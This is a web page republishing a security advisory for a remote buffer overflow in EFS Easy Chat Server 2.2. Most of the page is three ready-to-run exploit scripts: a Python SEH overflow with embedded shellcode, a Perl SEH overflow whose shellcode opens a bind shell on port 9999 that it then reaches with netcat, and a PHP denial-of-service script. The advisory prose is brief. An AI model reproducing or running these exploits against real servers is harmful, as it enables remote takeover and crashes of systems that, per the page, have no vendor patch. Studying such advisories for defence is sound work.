Home » Exploits » EFS Software Easy Chat Server Authentication Request Handling Remote Buffer Overflow Vulnerability EFS Software Easy Chat Server Authentication Request Handling Remote Buffer Overflow Vulnerability Feeds - Exploits Written by NetJackal    Wednesday, 04 March 2009 22:17 EFS Software Easy Chat Server Authentication Request Handling Remote Buffer Overflow Vulnerability -\\Bugtraq ID: 25328 -\\Class: Boundary Condition Error -\\CVE: -\\Remote: Yes -\\Local: No -\\Published: Aug 14 2007 12:00AM -\\Updated: Mar 04 2009 05:46PM -\\Credit: NetJackal -\\Vulnerable: EFS Software Easy Chat Server  2.2 -\\Discussion Easy Chat Server is prone to a remote buffer-overflow vulnerability. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. Easy Chat Server 2.2 is reported vulnerable; other versions may also be affected. -\\Exploit(s)/PoC(s): Attackers can use a browser to exploit this issue. A proof of concept and exploits are available: =============================================================== 25328.py ^^^^^^^^^ #!/usr/bin/python #[*] Bug :         EFS Easy Chat Server Authentication Request  Buffer Overflow Exploit (SEH) #[*] Refer :        http://www.milw0rm.com/exploits/4289 #[*] Tested on :    Xp sp2 (fr) #[*] Exploited by : His0k4 #[*] Greetings :    All friends & muslims HaCkErs (DZ) import struct import socket buf = "\x41"*216 buf += "\xEB\x06\xAE\xFA" #jmp+6 buf += "\xB6\xB2\x01\x10" #universal pop pop ret buf += "\x90"*19 # win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com buf+=(     "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"     "\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff"     "\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3"     "\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7"     "\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc"     "\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e"     "\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31"     "\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2"     "\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe"     "\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba") head  = "GET /chat.ghp?username="+buf+"&password="+buf+"&room=1 HTTP/1.1\r\n" head += "Host: 127.0.0.1\r\n" s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('127.0.0.1',80)) s.send(head + "\r\n\r\n") s.close() =============================================================== 25328-Dr4sH.pl ^^^^^^^^^^^^^^^ #!/usr/bin/perl # # EFS Easy Chat Server Authentication Request Buffer Overflow (SEH) # # Reference: http://www.milw0rm.com/exploits/8142 # # Tested in Windows XP Pro SP2-3 # # Coded by Dr4sH (Bruno F.) # # Contact: dr4sh[at]hotmail[dot]com # # Thankz: His0ka, str0ke, Vinicius N. # #[......................................................] # # bt~# perl easychat_server_bof.pl 192.168.1.64 # # EFS Easy Chat Server Remote BoF Exploit (SEH) # # [*] Sending Diabolic request... # [*] Connecting to bindshell 192.168.1.64:9999 # # Microsoft Windows XP [versão 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Program Files\Easy Chat Server> # #[......................................................] # # Enjoy! # use IO::Socket; print "\nEFS Easy Chat Server Remote BoF Exploit (SEH)\n\n"; $host = shift || die "Usage: perl $0 <host>\n"; $junk = "\x90" x 208; $jmp  = "\xEB\x06\xAE\xFA"; $ppr  = "\xB6\xB2\x01\x10"; $shellcode = "\xd9\xe8\xd9\x74\x24\xf4\xbb\xb6\x14\x60\xe5\x5d\x33\xc9\xb1".              "\x50\x31\x5d\x19\x03\x5d\x19\x83\xed\xfc\x54\xe1\x9c\x8f\x73".              "\x47\xb5\xa9\x7c\xa7\xba\x2a\x09\x34\x61\x8f\x86\x80\x55\x44".              "\xe4\x0f\xde\x5b\xfb\x9b\x51\x44\x88\xc3\x4d\x75\x65\xb2\x06".              "\x41\xf2\x44\xf7\x9b\xc4\xde\xab\x58\x04\x94\xb4\xa1\x4e\x58".              "\xba\xe3\xa5\x97\x87\xb7\x1d\x70\x8d\xd2\xd6\xdf\x49\x1c\x03".              "\xb9\x1a\x12\x98\xcd\x42\x37\x1f\x39\x7f\x6b\x94\x34\xec\x57".              "\xb6\x27\x2e\xa6\x1d\xc3\x3b\x8a\x91\x87\x7c\x01\x5a\xe7\x60".              "\xb4\xd7\x48\x91\x98\x8f\xc6\xef\x2a\xa3\x87\x10\xe4\x5d\x7b".              "\x89\x61\x92\x49\x3d\x05\xa7\x9f\xe2\xbd\xb8\x30\x74\xf5\xab".              "\x4d\xbe\x59\xcc\x78\x9e\xd0\xd7\xe3\xa0\x0e\x1f\xee\xf7\xba".              "\x1d\x11\x27\x52\xf8\xe4\x3d\x0e\xad\x09\x6b\x02\x02\xa5\xc7".              "\xf6\xe7\x1a\xab\xab\x18\x4c\x4d\x24\xc1\x62\xf4\xe7\x84\x9c".              "\x6d\x6f\x32\x44\xfe\xb7\x6d\x86\x28\x5d\x81\x29\x80\x5d\x71".              "\xa1\x8e\x0f\x5f\xdb\x98\xb0\x49\x48\x72\xb0\xa5\x07\x99\x07".              "\xc3\x91\x36\x67\x1d\x71\xed\xc3\xf4\x8d\xdd\x7f\x9e\x96\xa7".              "\xb9\x27\x0e\xa7\x90\x82\x4f\x87\x7b\x46\xd4\x4e\xec\xf5\x79".              "\x06\x09\x93\xd1\x41\xfb\xaf\x5b\x96\x91\x6b\xd5\xbb\x57\xb3".              "\x16\x91\x66\x71\xf4\x18\xd4\x59\x95\x68\xa3\x99\x32\xd9\xff".              "\xb1\x36\xe0\xb3\x57\x48\x69\xf0\xa8\x60\xc9\xaf\x04\xdc\xbf".              "\x1e\xc2\xdf\x6e\xf0\x47\xb1\x6f\x22\x0f\x9c\x49\xc6\x01\x8d".              "\x96\x1f\xf7\xcd\x96\x97\xf8\xe2\xe2\x8f\xfa\x80\x31\x4b\xfd".              "\x51\xeb\x6b\xd1\x36\xfc\x1e\xd5\x99\xaf\xe1\x03\xda\x80\x14"; $buffer = $junk.$jmp.$ppr.$shellcode; $socket = IO::Socket::INET->new(PeerAddr=> $host,                                 PeerPort=> '80',                                 Proto=> 'tcp',                                 Timeout=>'1') || die "[-] Unable to Connect.!\n"; print "[*] Sending Diabolic request...\n"; print $socket "GET /chat.ghp?username=".$buffer."&password=ydw&room=2&ydw=2 HTTP/1.1\r\n"; print $socket "Host: $host\r\n\r\n\r\n"; close($socket); print "[*] Connecting to bindshell $host:9999\n\n"; system("nc $host 9999"); =============================================================== easychat_dos.txt ^^^^^^^^^^^^^^^^^ <?php ########################################################## ###----------------------------------------------------### ###--------Easy Chat Server Remote DoS Exploit---------### ###----------------------------------------------------### ###-http://www.echatserver.com/------------------------### ###----------------------------------------------------### ###-Tested on version 2.2 [last version]-(XP SP2)------### ###----------------------------------------------------### ###-Usage:-php dos.php [TARGET] [PORT]-----------------### ###----------------------------------------------------### ###-Author:--NetJackal---------------------------------### ###-Email:---nima_501[at]yahoo[dot]com-----------------### ###-Website:-http://netjackal.by.ru--------------------### ###----------------------------------------------------### ########################################################## /* Description:  Easy Chat Server has built-in web server let users login to chat server. Login page allow Max 30 characters length for Name & Password. If attacker inserts a long Name & Password by editing or make his own login page, chat server will crash. */ echo "Easy Chat Server Remote DoS Exploit\n\t\t\t\tby NetJackal"; if($argc<2)die("\nUsage:   php dos.php [TARGET] [PORT]\nExample: php dos.php localhost 80\n"); $host=$argv[1]; $port=$argv[2]; $A=str_repeat('A',999); echo "\nConnecting..."; $link=fsockopen($host,$port,$en,$es,30); if(!$link)die("\n$en: $es"); echo "\nConnected!"; echo "\nSending exploit..."; fputs($link,"GET /chat.ghp?username=$A&password=$A&room=1&sex=2 HTTP/1.1\r\nHost: $host\r\n\r\n"); echo "\nWell done!\n"; ?> -\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:  This e-mail address is being protected from spambots. You need JavaScript enabled to view it . -\\References(s) --Easy Chat Software Home Page http://www.echatserver.com/index.ht  (EFS Software)

Security Services by HSC Contact us Become partner Advertise with us Join our staff